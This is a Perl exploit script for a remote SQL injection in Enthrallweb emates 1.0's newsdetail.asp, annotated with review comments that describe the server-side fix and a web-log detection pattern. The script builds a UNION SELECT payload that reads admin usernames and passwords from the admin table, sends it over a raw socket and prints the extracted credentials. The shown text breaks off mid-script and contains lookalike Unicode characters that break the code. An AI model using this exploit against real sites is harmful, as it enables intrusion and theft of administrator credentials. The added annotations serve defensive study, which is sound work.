1 #!/usr/bin/perl
2 #[Script Name: Enthrallweb emates 1.0 (newsdetail.asp) Remote SQL Injection Exploit
3 #[Coded by : ajann
4 #[Author : ajann
5 #[Contact : :(
6 #[S.Page : http://www.enthrallweb.us
7 #[$ : 119.40 USD
8 #[.. : ajann,Turkey
9
10 use IO::Socket;
# Argument gate: prints the banner below and exits when fewer than three
# command-line arguments are supplied. The arguments are only counted here,
# not validated.
11 if(@ARGV < 3){
12 print "
13

[========================================================================
14

[// Enthrallweb emates 1.0 (newsdetail.asp) Remote SQL Injection Exploit
15

[// Usage: exploit.pl [target] [path]
16

[// Example: exploit.pl victim.com /
17

[// Example: exploit.pl victim.com /path/
18

[// Vuln&Exp : ajann
19

[========================================================================
20 ";
21 exit();
22 }
23 #Local variables
# Builds the request URL from the command-line arguments; none of them is
# validated before use.
24 $server = $ARGV[0];
# Removes a literal "http://" from the first argument. The /e flag evaluates the
# (empty) replacement as code, so it adds nothing over a plain s///g.
25 $server =~ s/(http:\/\/)//eg;
26 $host = "http://".$server;
27 $port = "80";
28 $dir = $ARGV[1];
29 $file = "/newsdetail.asp?ID=";
# Value sent in the ID parameter: a URL-encoded UNION SELECT that reads
# admin_username and admin_password from a table named admin, with the third
# argument appended as the operand of "id like".
# NOTE(review): the server-side query is not shown here; the payload presumes that
# newsdetail.asp concatenates ID into its SQL. The fix on that side is to accept
# only an integer ID and bind it as a query parameter.
# Detection: requests to newsdetail.asp whose ID value contains "union" and
# "select" (or anything non-numeric) are the pattern to search web logs for.
30 $target = "−1%20union%20select%200,admin_username,admin_password,0,0%20from%20admin%20where%20id%20like%20".$ARGV[2];
# Full request target: scheme and host, then directory, page and payload.
31 $target = $host.$dir.$file.$target;
32
33 #Writing data to socket
# Opens a TCP connection to port 80 and writes one hand-built HTTP/1.1 GET.
34 print "+**********************************************************************+\n";
35 print "+ Trying to connect: $server\n";
# Dies with "Connection failed" when the socket cannot be created.
36 $socket = IO::Socket::INET−>new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
# The request line carries the absolute URL built above rather than a bare path.
37 print $socket "GET $target HTTP/1.1\n";
38 print $socket "Host: $server\n";
39 print $socket "Accept: */*\n";
# Header lines end in a bare "\n" instead of CRLF, and only Host, Accept and
# Connection are sent (no User-Agent). NOTE(review): these traits may help pick
# the request out of raw captures or access logs; confirm against real traffic.
40 print $socket "Connection: close\n\n";
# Printed after the request has been written, not right after the connect;
# none of the socket writes are checked.
41 print "+ Connected!...\n";
42 #Getting
43 while($answer = <$socket>) {
44 if ($answer =~ /<\/b><font color=\"#FFFFFF\" size=\"1\" face=\"Verdana, Arial, Helvetica, sans−serif\">(.*?)<\/font>/
){
45 print "+ Exploit succeed! Getting admin information.\n";
46 print "+ −−−−−−−−−−−−−−−− +\n";
47 print "+ Username: $1\n";
48 }
49
50 if ($answer =~ /<b><font color=\"#FFFFFF\" size=\"1\" face=\"Verdana, Arial, Helvetica, sans−serif\">(.*?)<\/font>/){